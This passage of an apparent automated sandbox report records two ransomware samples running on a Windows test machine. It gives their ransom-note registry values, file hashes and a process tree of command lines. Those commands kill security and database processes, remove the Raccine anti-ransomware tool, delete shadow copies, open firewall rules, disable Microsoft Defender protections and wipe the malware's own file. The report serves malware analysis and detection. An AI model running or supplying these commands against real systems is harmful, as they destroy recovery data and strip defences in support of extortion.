wrote to memory of 3040 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 110 PID 3924 wrote to memory of 3648 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 112 PID 3924 wrote to memory of 3648 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 112 PID 3924 wrote to memory of 3572 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 114 PID 3924 wrote to memory of 3572 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 114 PID 3924 wrote to memory of 3336 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 115 PID 3924 wrote to memory of 3336 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 115 PID 3924 wrote to memory of 2836 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 118 PID 3924 wrote to memory of 2836 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 118 PID 3924 wrote to memory of 2820 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 120 PID 3924 wrote to memory of 2820 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 120 PID 3924 wrote to memory of 3480 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 123 PID 3924 wrote to memory of 3480 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 123 PID 3924 wrote to memory of 3888 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 124 PID 3924 wrote to memory of 3888 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 124 PID 3924 wrote to memory of 4020 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 125 PID 3924 wrote to memory of 4020 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 125 PID 3924 wrote to memory of 3344 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 128 PID 3924 wrote to memory of 3344 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 128 PID 3924 wrote to memory of 1320 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 130 PID 3924 wrote to memory of 1320 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 130 PID 3924 wrote to memory of 432 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 132 PID 3924 wrote to memory of 432 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 132 PID 3924 wrote to memory of 1328 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 134 PID 3924 wrote to memory of 1328 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 134 PID 3924 wrote to memory of 1316 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 135 PID 3924 wrote to memory of 1316 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 135 PID 3924 wrote to memory of 600 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 138 PID 3924 wrote to memory of 600 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 138 PID 3924 wrote to memory of 4104 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 140 PID 3924 wrote to memory of 4104 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 140 -
System policy modification 1 TTPs 4 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe"C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3924 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:2704
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:752
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:4052
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:3680
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:3844
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:1452
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1356
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:3884
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:3720
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:3288
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:3556
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:1344
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:760
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3648
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:1320
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:600
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4320
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:4392
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:4516
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4776
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4872
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4308
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:4720
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4844
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:4960
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:4020
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵PID:3948
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:408
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:3196
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe2⤵PID:4228
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4420
-
-
-
C:\Windows\PAExec-5568-RJMQBVDN.exeC:\Windows\PAExec-5568-RJMQBVDN.exe -service1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4288 -
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true3⤵PID:4888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true3⤵PID:4020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true3⤵PID:2268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true3⤵PID:4556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true3⤵PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force3⤵PID:788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 63⤵PID:3940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 03⤵PID:596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 63⤵PID:4780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 63⤵PID:1440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true3⤵PID:4272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 23⤵PID:984
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵
- Kills process with taskkill
PID:4488
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵PID:4484
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
Filesize367KB
MD5b31f6216e6bc5a6291a0b82de0377553
SHA10afdc5359268f7e78a0ca3c3c67752edd304a742
SHA2561c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb
SHA5127044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6
-
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
Filesize367KB
MD5b31f6216e6bc5a6291a0b82de0377553
SHA10afdc5359268f7e78a0ca3c3c67752edd304a742
SHA2561c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb
SHA5127044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6
-
Filesize
22KB
MD581f2e6838b3675761922aa2381151539
SHA162960abd80931dc373a5917051dbea46f8bc687a
SHA256c259fed4c0ad3fedac2fe51bcd019be0ff954e4daf913a278d106c2ade216b6a
SHA51280cdd76e82f9de07ae86c0f18eb655f0d4e43fbcf4cac79fc001a7a83ab9d2442e02be93c1adbf3b647b6e9288473790af3b17ff2cf4636fede9b4b22e108487
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD5478f1c1fcff584f4f440469ed71d2d43
SHA10900e9dc39580d527c145715f985a5a86e80b66c
SHA256c918bf6bad93b653f9d05007634b088be7b91ed4350b777905d0520d93d650eb
SHA5124ed62f2add77e0dd8e07e101ee06bdb8a15808b701c7580b09704bd4befdecf7cfe2fa29d6e96f2149a92f4e1b0cae0d9810a5cde3f4940145f8120f7322d1a7
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5f4912cd27f85cc109ddabd6e6c35d0a5
SHA1fd75c0930c4d4b9483ba83b11cae4f4d2d59ea2c
SHA25672255abde6af7af37088f46103add19fa78fd548031e1659029e41b4314652ee
SHA5121c2b32dc0fe135064a9f9be611f1f036dccd3d80bf1ad66f1f69cd371acecd0ddd42f191b2098da9b0f3571a646825fa0a7ceda44a945bfe83ab4e7803fa1b01
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5f4912cd27f85cc109ddabd6e6c35d0a5
SHA1fd75c0930c4d4b9483ba83b11cae4f4d2d59ea2c
SHA25672255abde6af7af37088f46103add19fa78fd548031e1659029e41b4314652ee
SHA5121c2b32dc0fe135064a9f9be611f1f036dccd3d80bf1ad66f1f69cd371acecd0ddd42f191b2098da9b0f3571a646825fa0a7ceda44a945bfe83ab4e7803fa1b01